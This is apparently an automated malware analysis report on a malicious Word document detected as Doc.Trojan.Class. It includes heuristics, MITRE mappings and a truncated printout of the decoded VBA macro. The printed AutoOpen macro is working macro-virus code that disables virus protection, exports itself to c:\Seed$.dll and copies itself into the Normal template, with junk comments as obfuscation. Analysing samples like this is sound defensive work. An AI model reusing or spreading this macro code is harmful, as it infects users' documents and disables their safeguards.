Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, indicating a malicious document. The AutoOpen macro attempts to disable virus protection and export a component to 'c:\Seed$.dll', suggesting it acts as a dropper for a secondary payload. The document body fabricates a story about managing a mailing list to mask the malicious intent.
Heuristics (6)
- ClamAV: Doc.Trojan.Class-37 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Class-37
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.cannabisculture.com (in document text, OLE body)
  - http://www.Microsoft.com (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19621 bytes |

SHA-256: 7a02d6e37e42e1d9fbab6491957c10bd1a6a8dd1123bb761487bc5809e1be14f
Detection: ClamAV: Doc.Trojan.Class-31
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'21309284529365719726447.793225708578E+20213092845293657197264421309284529
Randomize
'6799816521429861435612.92297889160166E+206799816521429861435616799816521
s = 0: r = 0
'4109539840076720081003.15284229397527E+2041095398400767200810041095398400
On Error GoTo 87
'4427837764408136965761.8071642698765E+204427837764408136965764427837764
Options.VirusProtection = False
'13773369695005958411.30855217938316E+181377336969500595841137733696
Options.SaveNormalPrompt = False
'26300406276566706591361.49046135920551E+21263004062765667065913626300406276
Options.ConfirmConversions = False
'4586133841535959540642.45798218673592E+204586133841535959540644586133841
fx = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'241398369003237840367.81609381986373E+182413983690032378403624139836900
xf = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'10445862025775009921008.09564670277215E+20104458620257750099210010445862025
If xf > 90 And fx > 0 Then GoTo 87
'10663660225111576969001.18981888635136E+20106636602251115769690010663660225
If xf < 90 Then
'184358596935365619616.51995600979873E+18184358596935365619611843585969
Set xs = NormalTemplate.VBProject.VBComponents.Item(1)
'38833825969463351455361.79937097799331E+21388338259694633514553638833825969
ActiveDocument.VBProject.VBComponents.Item(1).Name = xs.Name
'4339513922516555133447.18412320517253E+1943395139225165551334443395139225
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\Seed$.dll"
'4096896049210807168648.63655056302093E+194096896049210807168644096896049
End If
'155955139242227257763.47352294084171E+181559551392422272577615595513924
If fx = 0 Then Set xs = ActiveDocument.VBProject.VBComponents.Item(1)
'25679101009445429467041.14382282765052E+21256791010094454294670425679101009
k = Int(Rnd(1) * 100) + 1
'2274145344203678566564.63194663815018E+192274145344203678566562274145344
If k = 99 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.cannabisculture.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68)
'2398161960012448900892.98544805582081E+1923981619600124489008923981619600
l = Int(Rnd(1) * 75) + 1
'701741290040194332012.82060223953857E+19701741290040194332017017412900
If l = 74 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.Microsoft.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68)
'279993289711934460411.99336871122636E+1927999328971193446041279993289
m = Int(Rnd(1) * 50) + 1
'3333910810062043978242.06849089749741E+2033339108100620439782433339108100
If m = 49 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
'1755386508170965460811.24571812446973E+2017553865081709654608117553865081
n = Int(Rnd(1) * 25) + 1
'31497020676147093235244.63299867165401E+20314970206761470932352431497020676
If n = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(83) + Chr(69) + Chr(69) + Chr(68)
'2256630016407244508099.19000180807049E+192256630016407244508092256630016
xs.codemodule.AddFromFile ("c:\Seed$.dll")
'6729084961497575480963.34822768589028E+206729084961497575480966729084961
With xs.codemodule
'12935650225527492275846.82345557665546E+20129356502255274922758412935650225
For poly = 1 To 4
'875686464395071276963.45958569549067E+1987568646439507127696875686464
.deletelines 1
'16577077504116001516161.9229661239658
... (truncated)